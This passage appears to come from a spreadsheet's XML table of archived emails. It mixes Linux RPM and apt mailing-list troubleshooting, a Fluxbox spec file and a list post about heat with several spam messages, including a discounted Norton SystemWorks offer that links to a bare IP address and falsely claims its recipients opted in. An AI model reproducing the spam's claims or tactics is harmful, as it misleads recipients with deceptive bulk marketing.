 &lt;/span&gt;32 ---- M4683G/A Laser Toner for LaserWriter 12, 640PS --------------------------
 $ 85.50&lt;br&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;/tt&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;b&gt;&lt;font face="Lucida Sans Typewriter" size="3"&gt;Item&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Canon&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Price&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&lt;tt&gt;&lt;font color="#000000" size="2" face="Lucida Sans Typewriter"&gt;&lt;b&gt;&lt;span style="background-color: #C4C4A6"&gt;33 --- Fax
 CFX-L3500, CFX-4000 CFX-L4500, CFX-L4500IE &amp;amp; IF FX3 ----------- $ 49.50&lt;br&gt;
 &lt;/span&gt;33A -- L-250, L-260i, L-300 FX3 ------------------------------------------
 $ 49.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;33B -- LASER CLASS 2060, 2060P, 4000 FX3 ---------------------------------
 $ 49.50&lt;br&gt;
 &lt;/span&gt;34 --- LASER CLASS 5000, 5500, 7000, 7100, 7500, 6000 FX2 ----------------
 $ 49.50&lt;span style="background-color: #C4C4A6"&gt;&lt;br&gt;
 35 --- FAX 5000 FX2 ------------------------------------------------------
 $ 49.50&lt;br&gt;
 &lt;/span&gt;36 --- LASER CLASS 8500, 9000, 9000L, 9000MS, 9500, 9500 MS, 9500 S FX4 --
 $ 49.50&lt;span style="background-color: #C4C4A6"&gt;&lt;br&gt;
 36A -- Fax L700,720,760,770,775,777,780,785,790, &amp;amp; L3300 FX1
 ------------- $ 49.50&lt;br&gt;
 &lt;/span&gt;36B -- L-800, L-900 FX4 --------------------------------------------------
 $ 49.50&lt;span style="background-color: #C4C4A6"&gt;&lt;br&gt;
 37 --- A30R Toner Cartridge for PC-6, 6RE, 7, 11, 12 ---------------------
 $ 59.50&lt;br&gt;
 &lt;/span&gt;38 --- E-40 Toner Cartridge for PC-720, 740, 770, 790,795, 920, 950, 980 -
 $ 85.50&lt;span style="background-color: #C4C4A6"&gt;&lt;br&gt;
 38A -- E-20 Toner Cartridge for PC-310, 325, 330, 330L, 400, 420, 430 ----
 $ 85.50&lt;/span&gt;&lt;/b&gt;&lt;span style="background-color: #C4C4A6"&gt;&lt;br&gt;&lt;/span&gt;&lt;/font&gt;
 &lt;/tt&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Lucida Sans Typewriter" size="3"&gt;Item&amp;nbsp;&amp;nbsp;
 Xerox&amp;nbsp;&amp;nbsp;&amp;nbsp; Price&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&lt;tt&gt;&lt;font color="#000000" size="2" face="Lucida Sans Typewriter"&gt;&lt;b&gt;&lt;span style="background-color: #C4C4A6"&gt;39 ---- 6R900 75A ---- $ 55.50&lt;br&gt;
 &lt;/span&gt;40 ---- 6R903 98A ---- $ 46.50&lt;span style="background-color: #C4C4A6"&gt;&lt;br&gt;
 41 ---- 6R902 95A ---- $ 49.50&lt;br&gt;
 &lt;/span&gt;42 ---- 6R901 91A ---- $ 65.50&lt;span style="background-color: #C4C4A6"&gt;&lt;br&gt;
 43 ---- 6R908 06A ---- $ 42.50&lt;br&gt;
 &lt;/span&gt;44 ---- 6R899 74A ---- $ 47.50&lt;span style="background-color: #C4C4A6"&gt;&lt;br&gt;
 45 ---- 6R928 96A ---- $ 72.50&lt;br&gt;
 &lt;/span&gt;46 ---- 6R926 27X ---- $ 84.50&lt;span style="background-color: #C4C4A6"&gt;&lt;br&gt;
 47 ---- 6R906 09A ---- $ 92.50&lt;br&gt;
 &lt;/span&gt;48 ---- 6R907 4MV ---- $ 89.50&lt;span style="background-color: #C4C4A6"&gt;&lt;br&gt;
 49 ---- 6R905 03A ---- $ 46.50&lt;/span&gt;&lt;/b&gt;&lt;/font&gt;&lt;/tt&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#808000" size="3" face="Arial"&gt;30 Day unlimited warranty included on all
 products&lt;br&gt;
 GT Toner Supplies guarantees these cartridges to be free from defects in
 workmanship and material.&lt;/font&gt;&lt;/i&gt;
 &lt;/b&gt;
 &lt;/p&gt;
 &lt;p align="left"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#0000FF" size="3" face="Arial"&gt;We look
 forward in doing business with you.&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;
 &lt;/p&gt;
 &lt;p align="left"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#0000FF" size="3" face="Arial"&gt;Customer&amp;nbsp;
 Satisfaction guaranteed&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;
 &lt;/p&gt;
 &lt;p&gt;
 &lt;font size="2" face="Arial"&gt;&lt;b&gt;I&lt;font color="#000080"&gt;f you are ordering by e-mail or
 c.o.d. please fill out an order&lt;br&gt;
 form with the following information:&lt;/font&gt;&lt;font color="#808000"&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/i&gt;&lt;/font&gt;&lt;font color="#000080"&gt;
 &lt;/font&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/i&gt;&lt;font color="#000080" face="Arial"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;font color="#0000FF"&gt;
 &lt;/font&gt;&lt;font color="#808000"&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/font&gt;&lt;font color="#000080"&gt;&lt;br&gt;&lt;br&gt;
 &lt;/font&gt;&lt;font color="#808000"&gt;phone number&lt;br&gt;
 company name&lt;br&gt;
 first and last name&lt;br&gt;
 street address&lt;br&gt;
 city, state zip code&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font size="2" face="Arial"&gt;&lt;b&gt;&lt;i&gt;&lt;a href="mailto:gtts1@cable.net.co"&gt;&lt;font color="#0000FF"&gt;Order Now&lt;/font&gt;&lt;/a&gt; &lt;/i&gt;&lt;font color="#000080"&gt;or
 call toll free &lt;/font&gt;&lt;font size="3" color="#0000FF"&gt; 1-866-237-7397&lt;/font&gt; &lt;/b&gt;&lt;/font&gt;
 &lt;font size="2" face="Arial"&gt;&lt;b&gt;&lt;font color="#808000"&gt;&lt;br&gt;&lt;br&gt;
 &lt;/font&gt;&lt;font color="#000080"&gt;If you are ordering by purchase order please fill out an order form&lt;br&gt;
 with the following information:&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/font&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/i&gt;&lt;font color="#000080" face="Arial"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Arial" color="#808000" size="2"&gt;purchase order number&lt;br&gt;
 phone number&lt;br&gt;
 company or school name&lt;br&gt;
 shipping address and billing address&lt;br&gt;
 city, state zip code&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;/font&gt;&lt;/b&gt;&lt;font size="2" face="Arial"&gt;&lt;b&gt;&lt;i&gt;&lt;a href="mailto:gtts1@cable.net.co"&gt;&lt;font color="#0000FF"&gt;Order
 Now&lt;/font&gt;&lt;/a&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;b&gt;&lt;font size="2"&gt;&lt;i&gt;&lt;font color="#800000" size="2" face="Arial"&gt;All trade marks and brand names listed above are property
 of the respective&lt;br&gt;
 holders and used for descriptive purposes only.&lt;/font&gt;
 &lt;/i&gt;
 &lt;/font&gt;
 &lt;/b&gt;
 &lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Elias Sinderson wrote:
  &gt; Heh. Never mind the perfectly good desert in the southwest, right? Or is
  &gt; that area too hot for desert warfare training? I'll never understand.
 How hot it feels is affected by both temperature and humidity.  In 
 Mississippi they have lots of humidity, in the Southwest, we don't.
 As I know from experience, Mississippi feels a lot hotter at 90 degrees F. 
 than home (Santa Fe) does at 90.
 Perhaps the military didn't want to train in a real desert because 1) it 
 get's over 100 degrees and any time the air temp is greater than body temp 
 it affects performance, and 2) when those troops go to a real desert 
 they'll think it's so much nicer than Mississippi.
 No, I'm not maligning Mississippi.  I had a great time passing through last 
 year on vacation.
 Peace,
 Marty Halvorson
 marty@halvorson.us
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Harri wrote :
 &gt; On Wed, Feb 06, 2002 at 04:29:53PM +0200, Peter Peltonen wrote:
 &gt; &gt; Two issues:
 &gt; &gt; 
 &gt; &gt; --&lt;snip&gt;--
 &gt; &gt; Sorry, but the following packages have unmet dependencies:
 &gt; &gt;   openssh: Depends: openssl (= 0.9.5a) but 0.9.6b-8 is installed
 &gt; &gt;   php-pgsql: Depends: postgresql but it is not installed
 &gt; &gt;              Depends: libpq.so.2
 &gt; &gt; E: Unmet dependencies. Try using -f.
 &gt; &gt; --&lt;/snip&gt;--
 &gt; &gt; 
 &gt; &gt; 1. I have the following openssl packages installed:
 &gt; &gt; 
 &gt; &gt; --&lt;snip&gt;--
 &gt; &gt; openssl-perl-0.9.6b-8
 &gt; &gt; openssl-0.9.6b-8
 &gt; &gt; openssl095a-0.9.5a-11
 &gt; &gt; openssl-devel-0.9.6b-8
 &gt; &gt; --&lt;/snip&gt;--
 &gt; &gt; 
 &gt; &gt; The openssl095a package should provide the openssl-0.9.5a compatibility
 &gt; &gt; but apt doesn't think so? 
 &gt; 
 &gt; I believe that's just a matter of string parsing. If someone were to fix
 &gt; the openssh package, removing the explicit Requires:, I believe the
 &gt; automagic binary handler would figure the right libraries to use and
 &gt; install. I haven't met an openssh like that and in worst case I've had 3
 &gt; different openssl libraries (WTF can't they just bump a major version if
 &gt; it's incompatible?!?).
 Strange... all my openssh packages don't explicitly requires a version of
 openssl. What version of openssh do you have? Is it an official Red Hat
 package? I suppose it isn't, and using Red Hat's rpms will solve your
 problem.
 What you need to know for openssl is :
 0.9.5b is libcrypto.so.0 and libssl.so.0
 0.9.6  is libcrypto.so.1 and libssl.so.1
 0.9.6b is libcrypto.so.2 and libssl.so.2
 Now in all Red Hat packages I've seen so far, the only dependency is on
 those files and not on "openssl = version".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</si>
  <si>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Fw: PROTECT YOUR COMPUTER,YOU NEED SYSTEMWORKS!DGYWAOG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</si>
  <si>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&lt;title&gt;Does Your Computer Need an Oil Change&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table border=3D"0" width=3D"538" height=3D"1"&gt;
   &lt;tr&gt;
     &lt;td width=3D"538" height=3D"1" align=3D"center" bgcolor=3D"#000000"&gt;&lt;b=
 &gt;&lt;font face=3D"Century Gothic" size=3D"5" color=3D"#FFFFFF"&gt;Does Your Comp=
 uter Need an Oil
       Change?&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"0" width=3D"538" height=3D"151"&gt;
   &lt;tr&gt;
     &lt;td width=3D"530" height=3D"145"&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"5"&gt;N=
 orton&lt;/font&gt;&lt;font color=3D"#006600" face=3D"Verdana" size=3D"7"&gt;&lt;br&gt;&lt;/font=
 &gt;&lt;i&gt;&lt;font face=3D"Verdana" color=3D"#CC0000" size=3D"7"&gt;SystemWorks
       2002&lt;/font&gt;&lt;/i&gt;&lt;font size=3D"4" face=3D"Verdana"&gt;&lt;br&gt; &lt;/font&gt;&lt;font f=
 ace=3D"Tahoma" size=3D"5"&gt;Professional
       Edition&lt;/font&gt; &lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"0" width=3D"538" height=3D"26"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"20" align=3D"center" bgcolor=3D"#000000"&gt;=
 &lt;b&gt;&lt;font color=3D"#FFFFFF" face=3D"Century Gothic"&gt;Made
       by the Creators of the #1 Anti-Virus Software on the Market!&lt;/font&gt;&lt;=
 /b&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"0" width=3D"538" height=3D"77"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"71" align=3D"center"&gt;&lt;font face=3D"Lucida=
  Sans Unicode" color=3D"#CC0000"&gt;This
       &lt;u&gt;UNBEATABLE&lt;/u&gt; software suite comes with &lt;i&gt; EVERY&lt;/i&gt;
       program you'll &lt;/font&gt;&lt;font face=3D"Lucida Sans Unicode" color=3D"#F=
 F0000"&gt; ever&lt;/font&gt;&lt;font face=3D"Lucida Sans Unicode" color=3D"#CC0000"&gt; n=
 eed to answer the problems or threats that your
       computer faces each day of it's Life!&lt;br&gt;&lt;br&gt;&lt;/font&gt;&lt;font face=3D"Ta=
 homa" color=3D"#000000"&gt;&lt;b&gt;Included in this magnificent deal
       are the following programs:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"0" width=3D"538" height=3D"138"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"132" bgcolor=3D"#333333"&gt;&lt;font color=3D"#=
 FFFFFF"&gt;&lt;font size=3D"4" face=3D"Tahoma"&gt;Norton
       AntiVirus=FFFFFF99 2002 - &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"2"&gt;&lt;b=
 &gt;THE #1
       ANTI-VIRUS PROTECION EVER!&lt;/b&gt;&lt;/font&gt;&lt;font size=3D"4" face=3D"Tahoma=
 "&gt;&lt;br&gt;Norton Utilities=FFFFFF99 2002
       - &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"2"&gt;&lt;b&gt;DIAGNOSE ANY PROBLEM WI=
 TH YOUR
       SYSTEM!&lt;/b&gt;&lt;/font&gt;&lt;font size=3D"4" face=3D"Tahoma"&gt;&lt;br&gt;
       &lt;font size=3D"4"&gt;Norton Ghost=FFFFFF99 2002 - &lt;/font&gt;&lt;/font&gt;&lt;font fa=
 ce=3D"Tahoma" size=3D"2"&gt;&lt;b&gt;MAKES
       BACKING UP YOUR VALUABLE DATA EASY!&lt;/b&gt;&lt;/font&gt;&lt;font size=3D"4" face=3D=
 "Tahoma"&gt;&lt;br&gt;
       Norton CleanSweep=FFFFFF99 2002 - &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D=
 "2"&gt;&lt;b&gt;CLEANS
       OUT EXCESS INTERNET FILE BUILDUP!&lt;/b&gt;&lt;/font&gt;&lt;font size=3D"4" face=3D=
 "Tahoma"&gt;&lt;br&gt;
       Norton WinFax=FFFFFF99 Basic - &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"=
 2"&gt;&lt;b&gt;TURNS YOUR
       CPU INTO A FAX MACHINE!&lt;/b&gt;&lt;/font&gt;&lt;font size=3D"4" face=3D"Trebuchet=
  MS"&gt;&lt;br&gt;
       &lt;/font&gt;
       &lt;font size=3D"4" face=3D"Tahoma"&gt;GoBack=FFFFFFAE 3 Personal - &lt;/font=
 &gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"2"&gt;HELPS
       PREVENT YOU FROM MAKING ANY MISTAKES!&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"0" width=3D"538" height=3D"63"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"57" align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Ver=
 dana" size=3D"4" color=3D"#800000"&gt;*ALL
       this has a retail price of $99.95*&lt;/font&gt;&lt;font face=3D"Verdana" size=
 =3D"5" color=3D"#FF0000"&gt;&lt;BR&gt; &lt;/font&gt;&lt;font face=3D"Verdana" color=3D"#FF00=
 00" size=3D"6"&gt; Get it
       Now for ONLY $29.99!&lt;/font&gt;&lt;font face=3D"Verdana" size=3D"5" color=3D=
 "#FF0000"&gt;&lt;br&gt;&lt;/font&gt;&lt;i&gt;&lt;font face=3D"Verdana" size=3D"5" color=3D"#666666=
 "&gt;with
       FREE SHIPPING!&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"1" width=3D"538" height=3D"60" bgcolor=3D"#333333"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"54" align=3D"center"&gt;&lt;font size=3D"6" col=
 or=3D"#FFFFFF" face=3D"Impact"&gt;&lt;a href=3D"http://64.251.23.141/affiliates/=
 norton/systemworkse123.htm" style=3D"color: #FFFFFF"&gt;CLICK
       HERE to order NOW!&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&lt;font color=3D"#000000" face=3D"System"&gt;This Product is available NOW. =
 When we
 run out it's gone, so get it while it's HOT!&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;table border=3D"1" width=3D"538" height=3D"10" bordercolorlight=3D"#66666=
 6" bordercolordark=3D"#333333"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"4" align=3D"center"&gt;&lt;font face=3D"Tahoma"=
  size=3D"1" color=3D"#666666"&gt;Your
       email address was obtained from an opt-in list. Opt-in IAO (Internet
       Advertising Organisation)&amp;nbsp; List&lt;br&gt;
       &amp;nbsp;Serial No. EGU601.&amp;nbsp;&amp;nbsp;If you wish to be unsubscribed f=
 rom
       this list, please &lt;a style=3D"color: #800000" href=3D"http://64.251.=
 23.141/affiliates/norton/removeme.html"&gt;Click
       here&lt;/a&gt;. We do not condone spam in any shape or form. Thank You kin=
 dly
       for your cooperation.&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Fluxbox
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --------------Boundary-00=_OYOXHTVA0T2X8R5S233Y
 Content-Type: text/plain;
   charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 Hi,
 =09I made a spec file for it some weeks ago, maybe it can be included in =
 fresh.=20
 If not,  at least you can use it...
 I'm attaching it here...
 Hope it might be some use for you, does the trick for me. Might be an old=
 =20
 version though, but should still work
 Nick
 On Wednesday 04 September 2002 21:00, Doug Stewart wrote:
 &gt; I've noted that there are packaged versions of
 &gt; Blackbox and hackedbox available from FreshRPMs.  What
 &gt; about FluxBox? http://fluxbox.sf.net
 &gt;
 &gt; I'd certainly enjoy a packaged version, since its
 &gt; creators seem hesitant to provide .rpms (.debs, yes,
 &gt; but no .rpms).
 &gt;
 &gt; .Doug
 &gt;
 &gt; __________________________________________________
 &gt; Do You Yahoo!?
 &gt; Yahoo! Finance - Get real-time stock quotes
 &gt; http://finance.yahoo.com
 &gt;
 &gt; _______________________________________________
 &gt; RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
 --------------Boundary-00=_OYOXHTVA0T2X8R5S233Y
 Content-Type: text/plain;
   charset="iso-8859-1";
   name="fluxbox.spec"
 Content-Transfer-Encoding: 7bit
 Content-Disposition: attachment; filename="fluxbox.spec"
 Summary: Blackbox derived window manager
 Name: fluxbox
 Version: 0.1.10
 Release: nv1
 License: other
 Group: User Interface/Desktops
 Source: http://prdownloads.sourceforge.net/fluxbox/%{name}-%{version}.tar.gz
 URL: http://fluxbox.sourceforge.net
 BuildRoot: %{_tmppath}/%{name}-root
 BuildRequires: XFree86-devel, libstdc++-devel
 %description
 Fluxbox is yet another windowmanager for X.
 It's based on the Blackbox 0.61.1 code. Fluxbox looks like blackbox and 
 handles styles, colors, window placement and similar thing exactly like 
 blackbox (100% theme/style compability).
 Many changes and improvements have been made to the code, such as window tabs, 
 iconbar, native keygrabber, gnome and kde support etc.
 %prep
 %setup -q
 %build
 %configure --enable-xinerama --enable-gnome --enable-kde
 make
 %install
 rm -rf %{buildroot}
 %makeinstall
 %clean
 rm -rf %{buildroot}
 %files
 %defattr(-, root, root)
 %doc README NEWS COPYING AUTHORS INSTALL TODO doc/Coding_style
 %{_bindir}/*
 %{_datadir}/%{name}
 %{_mandir}/man1/*
 %changelog
 * Thu Jul 19 2002 Nick Verhaegen
 - Update to 0.1.10
 * Tue Jul 9 2002 Nick Verhaegen
 - Initial RPM release.
 --------------Boundary-00=_OYOXHTVA0T2X8R5S233Y--
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Ack, apt-get still failing for me, stumped. [RH8]
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I've also just tried doing rpm --rebuilddb, no change.
 A question:
 Do these files look too small?  
 root@canarsie:/var/cache/apt # ls -ltr
 total 148
 drwxr-xr-x    2 root     root         4096 Sep 29 10:49 gensrclist
 drwxr-xr-x    2 root     root         4096 Sep 29 10:49 genpkglist
 drwxr-xr-x    3 root     root         4096 Oct  8 19:59 archives
 -rw-r--r--    1 root     root        49863 Oct  9 15:25 srcpkgcache.bin
 -rw-r--r--    1 root     root       158131 Oct  9 15:25 pkgcache.bin
 I ran strings on them, and it doesn't look like I see a complete listing
 of either my system's installed RPMs, or the rpms in the lists:
 root@canarsie:/var/state/apt/lists # ls -s
 total 9988
  416 apt.freshrpms.net_redhat_8.0_en_i386_base_pkglist.freshrpms
 8704 apt.freshrpms.net_redhat_8.0_en_i386_base_pkglist.os
    0 apt.freshrpms.net_redhat_8.0_en_i386_base_pkglist.updates
    4 apt.freshrpms.net_redhat_8.0_en_i386_base_release.freshrpms
    4 apt.freshrpms.net_redhat_8.0_en_i386_base_release.os
    4 apt.freshrpms.net_redhat_8.0_en_i386_base_release.updates
   64 apt.freshrpms.net_redhat_8.0_en_i386_base_srclist.freshrpms
  788 apt.freshrpms.net_redhat_8.0_en_i386_base_srclist.os
    0 apt.freshrpms.net_redhat_8.0_en_i386_base_srclist.updates
    0 lock
    4 partial
 If I kill them, they get recreated about the same size next time I run
 apt-get..
 -SteveK
 On Tue, Oct 08, 2002 at 08:01:48PM -0400, Steve Kann wrote:
 &gt; 
 &gt; I posted about this last week, and I'm still stumped.  apt-get is just
 &gt; not working for me, and I can't figure out what the problem is.
 &gt; 
 &gt; I've tried removing the apt rpms, making sure to remove any traces left
 &gt; behind (/etc/apt /var/state/apt /var/cache/apt), and still, I get
 &gt; "couldn't find package xmms-mp3" when running "apt-get install xmms-mp3".
 &gt; 
 &gt; Any clues?  Here's a log of a fresh try:
 &gt; 
 &gt; root@canarsie:/tmp # rpm -e apt apt-devel
 &gt; root@canarsie:/tmp # rm -rf /etc/apt /var/cache/apt /var/state/apt
 &gt; root@canarsie:/tmp # rpm -ivh apt-0.5.4cnc7-fr1.i386.rpm apt-devel-0.5.4cnc7-fr1.i386.rpm
 &gt; warning: apt-0.5.4cnc7-fr1.i386.rpm: V3 DSA signature: NOKEY, key ID
 &gt; e42d547b
 &gt; Preparing...                ########################################### [100%]
 &gt;    1:apt                    ########################################### [ 50%]
 &gt;    2:apt-devel              ########################################### [100%]
 &gt; root@canarsie:/tmp # apt-get update
 &gt; Ign http://apt.freshrpms.net redhat/8.0/en/i386 release
 &gt; Get:1 http://apt.freshrpms.net redhat/8.0/en/i386/os pkglist [1276kB]
 &gt; Get:2 http://apt.freshrpms.net redhat/8.0/en/i386/os release [108B]
 &gt; Get:3 http://apt.freshrpms.net redhat/8.0/en/i386/updates pkglist [14B]
 &gt; Get:4 http://apt.freshrpms.net redhat/8.0/en/i386/updates release [113B]
 &gt; Get:5 http://apt.freshrpms.net redhat/8.0/en/i386/freshrpms pkglist
 &gt; [57.1kB]
 &gt; Get:6 http://apt.freshrpms.net redhat/8.0/en/i386/freshrpms release
 &gt; [125B]
 &gt; Get:7 http://apt.freshrpms.net redhat/8.0/en/i386/os srclist [152kB]
 &gt; Get:8 http://apt.freshrpms.net redhat/8.0/en/i386/updates srclist [14B]
 &gt; Get:9 http://apt.freshrpms.net redhat/8.0/en/i386/freshrpms srclist
 &gt; [14.4kB]
 &gt; Fetched 1500kB in 11s (125kB/s)
 &gt; Reading Package Lists... Done
 &gt; root@canarsie:/tmp # apt-get install xmms-mp3
 &gt; Reading Package Lists... Done
 &gt; Building Dependency Tree... Done
 &gt; E: Couldn't find package xmms-mp3
 &gt; root@canarsie:/tmp # apt-cache search xmms
 &gt; root@canarsie:/tmp #
 &gt; 
 &gt; 
 &gt; Beats me..
 &gt; 
 &gt; -SteveK
 &gt; 
 &gt; 
 &gt; 
 &gt; -- 
 &gt;   Steve Kann - Chief Engineer - 520 8th Ave #2300 NY 10018 -  (212) 533-1775
 &gt;                 HorizonLive.com - collaborate . interact . learn
 &gt;    "The box said 'Requires Windows 95, NT, or better,' so I installed Linux."
 -- 
   Steve Kann - Chief Engineer - 520 8th Ave #2300 NY 10018 -  (212) 533-1775
                 HorizonLive.com - collaborate . interact . learn
    "The box said 'Requires Windows 95, NT, or better,' so I installed Linux."
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Brian wrote :
 &gt; hey i have a problem:
 &gt; i have a rpms that i have installed that i want to uninstall, i do it
 &gt; like so:
 &gt; rpm -e [rpm package]
 &gt; and it gives the error: package not installed, so i install it like
 &gt; so:
 &gt; rpm -i [rpm package]
 &gt; and it gives the error: package already installed, so i force it to
 &gt; install like so:
 &gt; rpm -i --force [rpm package]
 &gt; this installs it and then i try to uninstall it again and it still
 &gt; gives me the same error: package not installed.
 &gt;  
 &gt; How can i get it to recognize that the package is indeed installed it,
 &gt; and/or get it to unstall it?
 You're a bit too vague on your "[rpm package]" here...
 Maybe this will help you :
 [root@python apg]# rpm -e apg
 [root@python apg]# rpm -ivh apg-1.2.13-fr1.i386.rpm 
 Preparing...                ###########################################
 [100%]   1:apg                   
 ########################################### [100%][root@python apg]# rpm -e
 apg[root@python apg]# rpm -ivh apg-1.2.13-fr1.i386.rpm 
 Preparing...                ###########################################
 [100%]   1:apg                   
 ########################################### [100%][root@python apg]# rpm -e
 apg-1.2.13-fr1[root@python apg]# rpm -ivh apg-1.2.13-fr1.i386.rpm 
 Preparing...                ###########################################
 [100%]   1:apg                   
 ########################################### [100%][root@python apg]# rpm -e
 apg-1.2.13-fr1.i386.rpm error: package apg-1.2.13-fr1.i386.rpm is not
 installed[root@python apg]# 
 You can just put the name, of the name and version, and even the release,
 but the entire filename will not work!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</si>
  <si>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Have skin like a model
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000"&gt;
 &lt;table border="0" cellspacing="0" cellpadding="0" align="center" width="100" height="354"&gt;
   &lt;tr&gt; 
 	&lt;td rowspan="3" valign="top" width="95"&gt;&lt;a href="http://click.top-special-offers.com/cgi-bin/t.pl?id=10794:60763006"&gt;&lt;img src="http://easycream.com/creative/1.jpg" width="94" height="443" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td colspan="2"&gt;&lt;a href="http://click.top-special-offers.com/cgi-bin/t.pl?id=10795:60763006"&gt;&lt;img src="http://easycream.com/creative/2.jpg" width="456" height="156" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
